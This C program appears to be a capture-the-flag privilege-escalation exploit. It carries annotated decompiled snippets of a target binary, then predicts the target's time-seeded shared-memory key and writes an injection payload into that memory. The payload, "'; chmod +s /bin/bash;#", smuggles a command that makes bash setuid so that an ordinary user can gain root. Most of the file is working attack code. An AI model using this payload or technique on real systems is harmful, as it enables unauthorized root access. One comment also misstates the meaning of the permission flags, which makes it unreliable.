#include <stdio.h>
#include <time.h>
#include <stdlib.h>
#include <sys/ipc.h>
#include <sys/shm.h>
#include <string.h>




// tVar4 = time((time_t *)0x0); // give out  current time
/* The time() function returns the current calendar time as a time_t value (usually the number of seconds since the Unix epoch: January 1, 1970, UTC).
* (time_t *)0x0 (or NULL) is passed as the argument, which tells the time() function to return the time but not store it in a time_t variable.
* The result is assigned to the variable tVar4. This value represents the current time in seconds.
*/
// srand((uint)tVar4);
/* srand() sets the seed for the pseudo-random number generator used by rand().
* By passing the uint cast of tVar4 (current time), the seed is made dynamic. This ensures that the random numbers generated by rand() will differ with each execution of the program (assuming the time changes between runs).
*/
// key = tvar4 % 0xfffff
// __shmid = shmget(key,0x400,0x3b6);
/* key: The first parameter (iVar2 % 0xfffff) specifies the unique key for identifying the shared memory segment. This key is often generated dynamically, as shown here with the modulus operation (iVar2 % 0xfffff). The % 0xfffff ensures the key stays within a valid range.
* 
* size: The second parameter (0x400) specifies the size of the shared memory segment in bytes. 0x400 (hexadecimal) equals 1024 in decimal, meaning the shared memory segment is 1024 bytes.
* 
* shmflg: The third parameter (0x3b6) defines flags and permissions for the shared memory segment. 0x3b6 in binary (11101101110) translates to:
* - Read and write access for the owner (rw).
* - Read access for the group (r).
* - Read access for others (r).
*/
// pcVar4 = strchr(pcVar4,0x3e);
// if (pcVar4 == (char *)0x0) {
//    puts("Malformed data in the shared memory.");
//}
/* The strchr() function is used to locate the first occurrence of a specific character (0x3e) within a string.
* pcVar4: Initially points to a memory location containing a string.
* After the operation, pcVar4 will either point to the first occurrence of the character 0x3e (> in ASCII) within the string, or it will be NULL (0x0) if the character is not found.
*/
/*    pcVar4 = strstr(__haystack,"Leaked hash detected");
*      if (pcVar4 == (char *)0x0) {
*        puts("No hash detected in shared memory.");
*      }
*
* This snippet is part of a program that validates or processes data stored in shared memory. It specifically looks for the phrase "Leaked hash detected" to determine if the shared memory contains certain expected content. If the substring is absent, it logs the outcome with an error message.
*/

// Main function
int main() {
    // Generate a random seed based on the current time
    unsigned int tVar4 = (unsigned int)time(NULL); // Get the current calendar time
    srand(tVar4); // Seed the random number generator to ensure different values each execution

    // Generate a random key for the shared memory segment
    key_t key = rand() % 0xFFFFF; // Limit the key to fit within the valid range for shmget

    // Create or get a shared memory segment (size: 1024 bytes, permissions: read/write for all)
    int __shmid = shmget(key, 0x400, IPC_CREAT | 0666); 
    if (__shmid < 0) { // Check if shmget failed
        perror("shmget failed"); // Print an error message
        return 1; // Exit the program with failure
    }
// from write_to_shm function
    // Attach the shared memory segment to the process's address space
    char *_s = (char *)shmat(__shmid, NULL, 0); //_s = shared memory
    if (_s == (char *)-1) { // Check if shmat failed
        perror("shmat failed"); // Print an error message
        return 1; // Exit the program with failure
    }

    // Write a formatted message into the shared memory
    const char *message = "Leaked hash detected > '; chmod +s /bin/bash;#"; // Sample message
    snprintf(_s, 0x400, "%s", message); // Copy the message into the shared memory

    // Print the content of shared memory to confirm successful writing
    printf("Message in shared memory: %s\n", _s);

    // Detach the shared memory segment from the process
    if (shmdt(_s) == -1) { // Check if shmdt failed
        perror("shmdt failed"); // Print an error message
        return 1; // Exit the program with failure
    }

    return 0; // Exit the program successfully
}
